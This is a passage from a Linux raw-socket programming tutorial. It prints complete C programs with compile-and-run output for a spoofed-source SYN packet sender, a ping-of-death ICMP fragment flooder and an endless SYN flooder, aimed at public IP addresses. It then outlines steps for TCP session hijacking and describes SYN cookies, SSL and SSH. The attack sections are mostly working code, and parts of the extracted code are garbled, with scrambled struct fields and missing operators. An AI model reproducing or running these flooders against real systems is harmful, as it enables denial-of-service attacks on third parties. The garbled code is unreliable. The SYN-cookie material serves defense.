struct sockaddr_in sin, din; int one = 1; const int *val = &one; memset(buffer, 0, PCKT_LEN); if(argc != 5) { printf("- Invalid parameters!!!\n"); printf("- Usage: %s <source hostname/IP> <source port> <target hostname/IP> <target port>\n", argv[0]); exit(-1); } sd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(sd < 0) { perror("socket() error"); exit(-1); } else printf("socket()-SOCK_RAW and tcp protocol is OK.\n"); // The source is redundant, may be used later if needed // Address family sin.sin_family = AF_INET; din.sin_family = AF_INET; // Source port, can be any, modify as needed sin.sin_port = htons(atoi(argv[2])); din.sin_port = htons(atoi(argv[4])); // Source IP, can be any, modify as needed sin.sin_addr.s_addr = inet_addr(argv[1]); din.sin_addr.s_addr = inet_addr(argv[3]); // IP structure ip->iph_ihl = 5; ip->iph_ver = 4; ip->iph_tos = 16; ip->iph_len = sizeof(struct ipheader) + sizeof(struct tcpheader); ip->iph_ident = htons(54321); ip->iph_offset = 0; ip->iph_ttl = 64; ip->iph_protocol = 6; // TCP ip->iph_chksum = 0; // Done by kernel // Source IP, modify as needed, spoofed, we accept through command line argument ip->iph_sourceip = inet_addr(argv[1]);

// Destination IP, modify as needed, but here we accept through command line argument ip->iph_destip = inet_addr(argv[3]); // The TCP structure. The source port, spoofed, we accept through the command line tcp->tcph_srcport = htons(atoi(argv[2])); // The destination port, we accept through command line tcp->tcph_destport = htons(atoi(argv[4])); tcp->tcph_seqnum = htonl(1); tcp->tcph_acknum = 0; tcp->tcph_offset = 5; tcp->tcph_syn = 1; tcp->tcph_ack = 0; tcp->tcph_win = htons(32767); tcp->tcph_chksum = 0; // Done by kernel tcp->tcph_urgptr = 0; // IP checksum calculation ip->iph_chksum = csum((unsigned short *) buffer, (sizeof(struct ipheader) + sizeof(struct tcpheader))); // Inform the kernel do not fill up the headers' structure, we fabricated our own if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0) { perror("setsockopt() error"); exit(-1); } else printf("setsockopt() is OK\n"); printf("Using:::::Source IP: %s port: %u, Target IP: %s port: %u.\n", argv[1], atoi(argv[2]), argv[3], atoi(argv[4])); // sendto() loop, send every 2 second for 50 counts unsigned int count; for(count = 0; count < 20; count++) { if(sendto(sd, buffer, ip->iph_len, 0, (struct sockaddr *)&sin, sizeof(sin)) < 0) // Verify { perror("sendto() error"); exit(-1); } else printf("Count #%u - sendto() is OK\n", count); sleep(2);

} close(sd); return 0; } [root@bakawali testraw]# gcc rawtcp.c -o rawtcp [root@bakawali testraw]# ./rawtcp - Invalid parameters!!! - Usage: ./rawtcp <source hostname/IP> <source port> <target hostname/IP> <target port> [root@bakawali testraw]# ./rawtcp 10.10.10.100 23 203.106.93.88 8008 socket()-SOCK_RAW and tcp protocol is OK. setsockopt() is OK Using:::::Source IP: 10.10.10.100 port: 23, Target IP: 203.106.93.88 port: 8008. Count #0 - sendto() is OK Count #1 - sendto() is OK Count #2 - sendto() is OK Count #3 - sendto() is OK Count #4 - sendto() is OK ... Network utilities applications such as ping and Traceroute (check Unix/Linux man page) use ICMP and raw socket. The following is a very loose ping and ICMP program example. It is taken from ping-of-death program. [root@bakawali testraw]# cat myping.c /* Must be root or SUID 0 to open RAW socket */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <string.h> #include <arpa/inet.h> int main(int argc, char *argv[]) { int s, i; char buf[400]; struct ip *ip = (struct ip *)buf; struct icmphdr *icmp = (struct icmphdr *)(ip + 1); struct hostent *hp, *hp2; struct sockaddr_in dst;

int offset; int on; int num = 100; if(argc < 3) { printf("\nUsage: %s <saddress> <dstaddress> [number]\n", argv[0]); printf("- saddress is the spoofed source address\n"); printf("- dstaddress is the target\n"); printf("- number is the number of packets to send, 100 is the default\n"); exit(1); } /* If enough argument supplied */ if(argc == 4) /* Copy the packet number */ num = atoi(argv[3]); /* Loop based on the packet number */ for(i=1;i<=num;i++) { on = 1; bzero(buf, sizeof(buf)); /* Create RAW socket */ if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket() error"); /* If something wrong, just exit */ exit(1); } /* socket options, tell the kernel we provide the IP structure */ if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { perror("setsockopt() for IP_HDRINCL error"); exit(1); } if((hp = gethostbyname(argv[2])) == NULL) { if((ip->ip_dst.s_addr = inet_addr(argv[2])) == -1) {

fprintf(stderr, "%s: Can't resolve, unknown host.\n", argv[2]); exit(1); } } else bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp>h_length); /* The following source address just redundant for target to collect */ if((hp2 = gethostbyname(argv[1])) == NULL) { if((ip->ip_src.s_addr = inet_addr(argv[1])) == -1) { fprintf(stderr, "%s: Can't resolve, unknown host\n", argv[1]); exit(1); } } else bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp>h_length); printf("Sending to %s from spoofed %s\n", inet_ntoa(ip>ip_dst), argv[1]); /* Ip structure, check the ip.h */ ip->ip_v = 4; ip->ip_hl = sizeof*ip >> 2; ip->ip_tos = 0; ip->ip_len = htons(sizeof(buf)); ip->ip_id = htons(4321); ip->ip_off = htons(0); ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* Let kernel fills in */ dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->type = ICMP_ECHO; icmp->code = 0; /* Header checksum */ icmp->checksum = htons(~(ICMP_ECHO << 8)); for(offset = 0; offset < 65536; offset += (sizeof(buf) sizeof(*ip)))

{ ip->ip_off = htons(offset >> 3); if(offset < 65120) ip->ip_off |= htons(0x2000); else ip->ip_len = htons(418); /* make total 65538 */ /* sending time */ if(sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) { fprintf(stderr, "offset %d: ", offset); perror("sendto() error"); } else printf("sendto() is OK.\n"); /* IF offset = 0, define our ICMP structure */ if(offset == 0) { icmp->type = 0; icmp->code = 0; icmp->checksum = 0; } } /* close socket */ close(s); usleep(30000); } return 0; } [root@bakawali testraw]# gcc myping.c -o myping [root@bakawali testraw]# ./myping Usage: ./myping <saddress> <dstaddress> [number] - saddress is the spoofed source address - dstaddress is the target - number is the number of packets to send, 100 is the default [root@bakawali testraw]# ./myping 1.2.3.4 203.106.93.94 10000 sendto() is OK. sendto() is OK. ... ... sendto() is OK. sendto() is OK. Sending to 203.106.93.88 from spoofed 1.2.3.4

sendto() is OK. ... You can verify this attack at the target machine by issuing the tcpdump vv command or other network analyzer tools such asEthereal/Wireshark.

LINUX SOCKET PART 18 Advanced TCP/IP - OTHER TCP/IP INFO


This is a continuation from Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples if any compiled using gcc, tested using the public IPs, run on Fedora Core 3, with several times of update, as root or SUID 0. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. SYN Flag Flooding By referring to the previous "three-way handshake" of the TCP, when the server gets a connection request, it sends a SYN-ACK to the spoofed IP address, normally doesn't exist. The connection is made to time-out until it gets the ACK segment (often called a half-open connection). Since the server connection queue resource is limited, flooding the server with continuous SYN segments can slow down the server or completely push it offline. This SYN flooding technique involves spoofing the IP address and sending multiple SYN segments to a server. In this case, a full tcp connection is never established. We can also write a code, which sends a SYNpacket with a randomly spoofed IP to avoid the firewall blocking. This will result in all the entries in our spoofed IP list, sending RST segments to the victim server, upon getting the SYN-ACK from the victim. This can choke the target server and often form a crucial part of a Denial Of Service (DOS) attack. When the attack is launched by many zombie hosts from various location, all target the same victim, it becomes Distributed DOS(DDOS). In worse case this DOS/DDOS attack might be combined with other exploits such as buffer overflow. The DOS/DDOS attack also normally use transit hosts as launching pads for attack. This means the attack may come from a valid IP/Domain name and masking the real initiators. The following is a program example that constantly sends out SYN requests to a host (Syn flooder). [root@bakawali testraw]# cat synflood.c #include <unistd.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/tcp.h> /* TCP flags, can define something like this if needed */ /* #define URG 32 #define ACK 16

#define #define #define #define */

PSH RST SYN FIN

8 4 2 1

struct ipheader { unsigned char unsigned unsigned unsigned unsigned unsigned unsigned unsigned unsigned unsigned unsigned }; char short short char short char char short int int int int int int

iph_ihl:5, /* Little-endian */ iph_ver:4; iph_tos; iph_len; iph_ident; iph_flags; iph_offset; iph_ttl; iph_protocol; iph_chksum; iph_sourceip; iph_destip;

/* Structure of the TCP header */ struct tcpheader { unsigned short int tcph_srcport; unsigned short int tcph_destport; unsigned int tcph_seqnum; unsigned int tcph_acknum; unsigned char tcph_reserved:4, tcph_offset:4; unsigned int tcp_res1:4, /*little-endian*/ tcph_hlen:4, /*length of tcp header in 32-bit words*/ tcph_fin:1, /*Finish flag "fin"*/ tcph_syn:1, /*Synchronize sequence numbers to start a connection*/ tcph_rst:1, /*Reset flag */ tcph_psh:1, /*Push, sends data to the application*/ tcph_ack:1, /*acknowledge*/ tcph_urg:1, /*urgent pointer*/ tcph_res2:2; unsigned short int tcph_win; unsigned short int tcph_chksum; unsigned short int tcph_urgptr; }; /* function for header checksums */ unsigned short csum (unsigned short *buf, int nwords) {

unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (unsigned short)(~sum); } int main(int argc, char *argv[ ]) { /* open raw socket */ int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); /* this buffer will contain ip header, tcp header, and payload we'll point an ip header structure at its beginning, and a tcp header structure after that to write the header values into it */ char datagram[4096]; struct ipheader *iph = (struct ipheader *) datagram; struct tcpheader *tcph = (struct tcpheader *) datagram + sizeof (struct ipheader); struct sockaddr_in sin; if(argc != 3) { printf("Invalid parameters!\n"); printf("Usage: %s <target IP/hostname> <port to be flooded>\n", argv[0]); exit(-1); } unsigned int floodport = atoi(argv[2]); /* the sockaddr_in structure containing the destination address is used in sendto() to determine the datagrams path */ sin.sin_family = AF_INET; /* you byte-order >1byte header values to network byte order (not needed on big-endian machines). */ sin.sin_port = htons(floodport); sin.sin_addr.s_addr = inet_addr(argv[1]); /* zero out the buffer */ memset(datagram, 0, 4096); /* we'll now fill in the ip/tcp header values */ iph->iph_ihl = 5; iph->iph_ver = 4; iph->iph_tos = 0; /* just datagram, no payload. You can add payload as needed */ iph->iph_len = sizeof (struct ipheader) + sizeof (struct

tcpheader); /* the value doesn't matter here */ iph->iph_ident = htonl (54321); iph->iph_offset = 0; iph->iph_ttl = 255; iph->iph_protocol = 6; // upper layer protocol, TCP /* set it to 0 before computing the actual checksum later */ iph->iph_chksum = 0;
/* SYN's can be blindly spoofed. Better to create randomly

generated IP to avoid blocking by firewall */ iph->iph_sourceip = inet_addr ("192.168.3.100"); /* Better if we can create a range of destination IP, so we can flood all of them at the same time */ iph->iph_destip = sin.sin_addr.s_addr; /* arbitrary port for source */ tcph->tcph_srcport = htons (5678); tcph->tcph_destport = htons (floodport); /* in a SYN packet, the sequence is a random */ tcph->tcph_seqnum = random(); /* number, and the ACK sequence is 0 in the 1st packet */ tcph->tcph_acknum = 0; tcph->tcph_res2 = 0; /* first and only tcp segment */ tcph->tcph_offset = 0; /* initial connection request, I failed to use TH_FIN, so check the tcp.h, TH_FIN = 0x02 or use #define TH_FIN 0x02*/ tcph->tcph_syn = 0x02; /* maximum allowed window size */ tcph->tcph_win = htonl (65535); /* if you set a checksum to zero, your kernel's IP stack should

fill in the correct checksum during transmission. */ tcph->tcph_chksum = 0; tcph-> tcph_urgptr = 0;

iph-> iph_chksum = csum ((unsigned short *) datagram, iph-> iph_len >> 1);

/* a IP_HDRINCL call, to make sure that the kernel knows the header is included in the data, and doesn't insert its own header into the packet before our data */ /* Some dummy */ int tmp = 1; const int *val = &tmp; if(setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0) { printf("Error: setsockopt() - Cannot set HDRINCL!\n"); /* If something wrong, just exit */ exit(-1); } else printf("OK, using your own header!\n");

/* You have to manually stop this program */ while(1) { if(sendto(s, /* our socket */

datagram, and data */ iph->iph_len, */ 0, 0 */

/* the buffer containing headers /* total length of our datagram /* routing flags, normally always

(struct sockaddr *) &sin, /* socket addr, just like in */ sizeof (sin)) < 0) printf("sendto() error!!!.\n"); else printf("Flooding %s at %u...\n", argv[1], floodport); /* a normal send() */

} return 0; } [root@bakawali testraw]# gcc synflood.c -o synflood [root@bakawali testraw]# ./synflood Invalid parameters! Usage: ./synflood <target IP/hostname> <port to be flooded> [root@bakawali testraw]# ./synflood OK, using your own header! Flooding 203.106.93.88 at 53... Flooding 203.106.93.88 at 53... Flooding 203.106.93.88 at 53... Flooding 203.106.93.88 at 53... Flooding 203.106.93.88 at 53... ... 203.106.93.88 53

You can verify this attack at the target machine by issuing the tcpdump vv command or other network monitoring programs such asEthereal.

SYN Cookies

SYN flooding leaves a finite number of half-open connections in the server while the server is waiting for a SYN-ACK acknowledgment. As long as the connection state is maintained, SYN flooding can prove to be a disaster in a production network. Though SYN flooding capitalizes on the basic flaw in TCP, ways have been found to keep the target system from going down by not maintaining connection states to consume precious resources. Though increasing the connection queue and decreasing the connection time-out period will help to a certain extent, it won't be effective under a rapid DDOS attack. SYN Cookies has been introduced and becomes part of the Linux kernels, in order to protect your system from a SYN flood. In the SYN cookies implementation of TCP, when the server receives aSYN packet, it responds with a SYN-ACK packet with the ACK sequence number calculated from source address, source port, source sequence, destination address, destination port, and a secret seed. Then the server relinquishes the state about the connection. If anACK comes from the client, the server can recalculate it to determine whether it is a response to the former SYN-ACK, which the server sent. To protect your system from SYN flooding, the SYN Cookies have to be enabled.

1. echo 1 > /proc/sys/net/ipv4/tcp_syncookies to your /etc/rc.d/rc.local script. 2. Edit /etc/sysctl.conf file and add the following line: net.ipv4.tcp_syncookies = 1 3. Restart your system.
Session Hijacking

Raw socket can also be used for Session Hijacking. In this case, we inject our own packet that having same specification with the original packet and replace it. As discussed in the previous section of the tcp connection termination, the client who needs to terminate the connection sends a FIN segment to the server (TCP Packet with the FIN flag set) indicating that it has finished sending the data. The server, upon receiving the FIN segment, does not terminate the connection but enters into a "passive close" (CLOSE_WAIT) state and sends an ACK for

the FIN back to the client with the sequence number incremented by one. Now the server enters intoLAST_ACK state. When the client gets the last ACK from the server, it enters into a TIME_WAIT state, and sends an ACK back to the server with the sequence number incremented by one. When the server gets the ACK from the client, it closes the connection. Before trying to hijack a TCP connection, we need to understand the TIME_WAIT state. Consider two systems, A and B, communicating. After terminating the connection, if these two clients want to communicate again, they should not be allowed to establish a connection before a certain period. This is because stray packets (if there are any) transferred during the initial session should not confuse the second session initialization. So TCP has set the TIME_WAIT period to be twice the MSL (Maximum Segment Lifetime) for the packet. We can spoof our TCP packets and can try to reset an established TCP connection with the following steps:

1. Sniff a TCP connection. In Linux for example, we need to set our Network Interface (NIC) to Promiscuous mode. In program, this can be done by using the setsockopt(). For example:
// add the promiscuous mode struct packet_mreq mr; memset(&mr, 0, sizeof(mr)); mr.mr_ifindex = ifconfig.ifindex; mr.mr_type = PACKET_MR_PROMISC;

if(setsockopt(ifconfig.sockid, SOL_PACKET, PACKET_ADD_MEMBERSHIP, (char *)&mr, sizeof(mr)) < 0) { perror("Failed to add the promiscuous mode"); return (1); }

2. Check if the packet has ACK flag set. If set, the Acknowledgment number is recorded (which will be our next packet sequence number) along with the source IP.

Establish a raw socket with spoofed IP and send out the FIN packet to the client with the recorded sequence number. Make sure that you have also set your ACK flag. Session Hijacking can also be done with the RST (Reset) flag.

A sniffer programs must make the network interface card (NIC) on a machine enter into a so-called promiscuous mode. This is because, for example, an Ethernet NIC is built with a filter that ignores all traffic that does not belong to it. This means it ignores all frames whose destination MAC address does not match with its own. Through the NICs driver, a sniffer program need to turn off this filter, putting the NIC into mode called promiscuous so that it will listen to all type of traffic that supposed to contain all type of packets. The typical NICs used in workstations and PCs nowadays can be put into promiscuous mode quite easily by turning the mode on or off. In fact, on many NICs, it is also possible to reprogram their MAC addresses. Network analyzing equipment deliberately and legitimately needs to observe all traffic, and hence be promiscuous. SYN Handshakes
Port scanner/sniffer such as Nmap use raw sockets to the advantage of stealth. They use a half-way-SYN handshake that basically works like the following steps:

1. Host A sends a special SYN packet to host B. 2. Host B sends back a SYN/ACK packet to host A. 3. Host A send RST packet in return.
This way, host B knows when it gets a connection and this is how most port scanners work. Nmap and others however, use raw sockets. When the SYN/ACK packet is received from host B, indicating that B got the SYN, host A then uses this and sends a specialRST (flag) packet (short for ReSeT) back to host B saying never mind about the connection, thus, they never make a full connection and the scan is stealthed out. Well, from the story in this Module, raw sockets are an extremely powerful method of controlling the underlying protocol of a packet and its data. Any network programmer should learn and understand how to use them for the right purposes.

Further interesting reading and digging:

Secure Socket Layer (SSL)

A protocol developed originally by Netscape for transmitting private documents via the Internet in an encrypted form. SSL ensures that the information is sent, unchanged, only to the server you intended to send it to. For example, online shopping sites frequently use SSL technology to safeguard your credit card information. SSL is a protocol for encrypting TCP/IP traffic that also incorporates authentication and data integrity. The newest version of SSL is sometimes referred to as Transport Layer Security (TLS) (the specification can be found at RFC 2246 and TLS v1.0 is equivalent to SSL v3.1. SSL runs on top of TCP/IP and can be applied to almost any sort of connection-oriented communication. SSL is based on session-key encryption. It adds a number of extra features, including authentication based on X.509 certificates and integrity checking with message authentication codes. It is an extension of sockets, which allow a client and a server to establish a stream of communication with each other in a secured manner. They begin with a handshake, which allows identities to be established and keys to be exchanged. SSL uses a cryptographic system that uses two keys to encrypt data: a public key known to everyone and a private or secret key known only to the recipient of the message. It is most commonly used to secure http. Both Netscape Navigator and Internet Explorer browsers support SSL and many web sites use the protocol to obtain confidential user information. By convention, URLs that require an SSL connection start with https: instead of http:. Another protocol for transmitting data securely over the World Wide Web is Secure HTTP (SHTTP). Whereas SSL creates a secure connection between a client and a server, over which any amount of data can be sent securely, S-HTTP is designed to transmit individual messages

securely. SSL and S-HTTP, therefore, can be seen as complementary rather than competing technologies. Both protocols have been approved by the Internet Engineering Task Force (IETF) as a standard. You can try OpenSSL, the open source version to learn more about SSL. One of real project example that implements the SSL is Apache web server (apache-ssl). Information about program examples can be obtained at openssl examples

Secure Shell (SSH)

Many users of telnet, rlogin, ftp and other communication programs transmit data such as user name and password across the Internet in unencrypted form. For more general applications, SSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks. Originally developed by SSH Communications Security Ltd., Secure Shell provides strong authentication and secure communications over insecure channels such as internet. It is a replacement for unsecured rlogin, rsh, rcp, and rdist. SSH protects a network from attacks such as IP spoofing, IP source routing, and DNS spoofing. An attacker who has managed to take over a network can only force SSH to disconnect. He or she cannot play back the traffic or hijack the connection when encryption is enabled. For example, when using ssh's secure login (instead of rlogin) the entire login session, including transmission of password, is encrypted; therefore it is almost impossible for an outsider to collect passwords. SSH is available for Windows, Unix, Macintosh, and OS/2, commercial or open source version and it also works with RSA authentication. To learn more about SSH, you ca use the free, open source version, OpenSSH. The OpenSSH suite includes the SSH program which replaces rlogin and telnet, scp which replaces rcp, and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keysign, ssh-keyscan, sshkeygen and sftp-server. OpenSSH supports SSH protocol versions 1.3, 1.5, and 2.0.

Вам также может понравиться